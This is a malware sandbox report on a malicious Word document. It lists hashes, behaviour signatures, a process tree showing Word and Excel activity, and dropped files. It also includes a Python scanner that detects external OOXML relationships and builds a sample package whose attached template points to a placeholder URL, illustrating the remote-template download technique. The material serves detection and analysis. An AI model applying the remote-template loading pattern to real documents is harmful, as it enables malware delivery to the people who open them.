Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-06-2024 06:31

General

  • Target

    1109cc2af86d8f1938445e968abc37c0_JaffaCakes118.doc

  • Size

    241KB

  • MD5

    1109cc2af86d8f1938445e968abc37c0

  • SHA1

    d8d05cd837412c2a6544c4dd431b62d413a67529

  • SHA256

    57abbecb41daf1a8fe546034062266430bc58151d4912b97b2e7ccbe118ae317

  • SHA512

    10ba11d7d41da9b1ab1a224bb9eae90bcd033083a9c422939fd9c5d570f32eb860383defd60062ff65958dbead890cb488084754b96b57cdbdc77ffc7a7e8fa0

  • SSDEEP

    1536:5terTkw9HnXPJguq73/IKB5Kby0g4XHrTPpyUK/dRYy1n6AmIahOJMnZx:5vw9HXPJguq73/IKBWyUOdSyTGZZx

Score
7/10

Signatures

  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
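The first signature fires when an Office Open XML package carries a relationship with TargetMode="External", so that Word or Excel fetches the target (typically a remote attached template, OLE object or frame) from outside the document as soon as it is opened. The scanner below is an added example, not code from this report or from the sandbox that produced it: it walks every .rels part of a package, lists all external relationships, and separates the types Office loads automatically from plain hyperlinks, which are only followed on click. It builds its own minimal sample package in memory and points it at the made-up URL http://example.invalid/template.dotm; the real external target of the analysed sample is not shown on this page and is not reproduced here. The .doc extension is deliberately not trusted: the check is on the ZIP signature, so a legacy binary .doc yields nothing and would need an OLE parser instead.

```python
"""Find OOXML relationships that resolve outside the package (TargetMode="External"),
the mechanism behind "Abuses OpenXML format to download file from external location".

Added example; not the report's or the sandbox's code. The sample package, its
relationships and the example.invalid URLs are constructed here.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship types whose external target Office fetches on open. A hyperlink is
# only followed when clicked, so it is listed but not treated as a remote loader.
LOADER_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}


def external_relationships(data: bytes) -> list[tuple[str, str, str]]:
    """Return (rels part, short relationship type, target) for every external
    relationship. Non-ZIP input (e.g. a legacy OLE2 .doc, whatever the file is
    named) returns an empty list rather than guessing."""
    if not data.startswith(b"PK\x03\x04"):
        return []
    found = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if not name.endswith(".rels"):
                    continue
                try:
                    root = ET.fromstring(zf.read(name))
                except ET.ParseError:
                    continue  # a malformed .rels part should not hide the others
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                        found.append((name, rtype, rel.get("Target", "")))
    except zipfile.BadZipFile:
        return []
    return found


def remote_loader_targets(data: bytes) -> list[str]:
    """Targets (URLs or UNC paths) that Office would fetch without user interaction."""
    return [t for _, rtype, t in external_relationships(data) if rtype in LOADER_TYPES]


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal package: settings.xml attaches a template whose
    relationship is external, plus a harmless external hyperlink for contrast.
    Sufficient for the scanner; not a complete Word-openable document."""
    rels_root = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" '
                 f'Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/></Relationships>')
    rels_doc = (f'<Relationships xmlns="{RELS_NS}">'
                f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>'
                f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
                'Target="https://example.invalid/contact" TargetMode="External"/>'
                '</Relationships>')
    rels_settings = (f'<Relationships xmlns="{RELS_NS}">'
                     f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
                     f'Target="{template_url}" TargetMode="External"/></Relationships>')
    settings = (f'<w:settings xmlns:w="{WML_NS}" xmlns:r="{OFFICE_REL[:-1]}">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", rels_root)
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{WML_NS}"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_doc)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", rels_settings)
    return buf.getvalue()


if __name__ == "__main__":
    # Pass a real file path to scan it; otherwise the constructed sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_docx("http://example.invalid/template.dotm")
    for part, rtype, target in external_relationships(data):
        print(f"{part}: {rtype} -> {target}")
    print("remote loader targets:", remote_loader_targets(data))
```

Run it against a suspect file to list every external relationship; only the entries returned by remote_loader_targets are fetched on open, and an external attachedTemplate in word/_rels/settings.xml.rels is the classic remote-template pattern. For an embedded workbook such as the one that launched EXCEL.EXE here, run the same scan on the embedded .xlsx part (word/embeddings/) after extracting it from the outer package.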

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1109cc2af86d8f1938445e968abc37c0_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2736
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:1692

Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{97CDB344-460C-4961-94AC-E755740D47BD}.FSD

      Filesize

      128KB

      MD5

      5f46d08693383e2177cfde8403b55cfc

      SHA1

      f84363074edcd8136c10a09d7572423ce7328305

      SHA256

      c6afa7e5177129eccdab7636971de2c55d5e99bc11e33af174cb3acca05187f0

      SHA512

      b73311785829babdc27fea5a6b62a80292e043139dc005efcf8127ca9bddd33dfb0f5fe51a51da537fe9a631e34548f0b3a54a1febe17efd1648aa6a620498d6

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      12723cbc37f9e2183c2553ac89d4e677

      SHA1

      875bd39a015e10119597c498b5181a82a70e55df

      SHA256

      5831f2473c74d3faf315c89b780faa47194964aa945ddba76a1b7f66d2f2de5e

      SHA512

      3f017ff4c2bc03889ea2c6ea43c8178e21289bf4d8d1eb18a8617c398efc74ee0c6b4e63975a70457a39a8b9b7ba845bc50121dfef3f6d4cad1dd48f1c9276c3

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{BA55C3A0-CDD0-4937-BC72-F1D435F42E4E}.FSD

      Filesize

      128KB

      MD5

      208796f8777ac0785495e63946e51e9e

      SHA1

      245614ea834f94783586341346a84738f619d7d4

      SHA256

      4b35248ec87980e47d2164328ff1fcec07e0b27fdffa91ab5b7cf7597df1e259

      SHA512

      bd68ed0aadbc59d83290d65c7bc85e83584860f8c8d4b9d53966835ca5da1eb4ee5a8d1ee784afd72d2215a2c8e4b82ada2fa35f5b2c4846ac92d17e5c22bba0

    • C:\Users\Admin\AppData\Local\Temp\{A7C1E559-7092-40EA-A154-8DC9DC8339ED}

      Filesize

      128KB

      MD5

      96feca8e64cda928cc6d69e8c7b9697d

      SHA1

      67f704b72f552d23ab39c4cf98e4659bceb880e7

      SHA256

      98a4c5f619845db9d9b42d406d093a691ba6630dd8a6f88a80b71f155b0b824e

      SHA512

      5ea587c315135fd5c794d09ad82e32e6948f2cd1b659040e5eaa2f03e1afd4759686d2edf96d47c4a9a393e4e48802e4fecebf685bfca9f7ba104521b8ab8b76

    • memory/2440-0-0x000000002FA21000-0x000000002FA22000-memory.dmp

      Filesize

      4KB

    • memory/2440-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2440-2-0x000000007135D000-0x0000000071368000-memory.dmp

      Filesize

      44KB

    • memory/2440-11-0x000000007135D000-0x0000000071368000-memory.dmp

      Filesize

      44KB

    • memory/2440-61-0x0000000004490000-0x0000000004590000-memory.dmp

      Filesize

      1024KB

    • memory/2440-516-0x0000000004490000-0x0000000004590000-memory.dmp

      Filesize

      1024KB

    • memory/2440-517-0x000000000F500000-0x000000000F600000-memory.dmp

      Filesize

      1024KB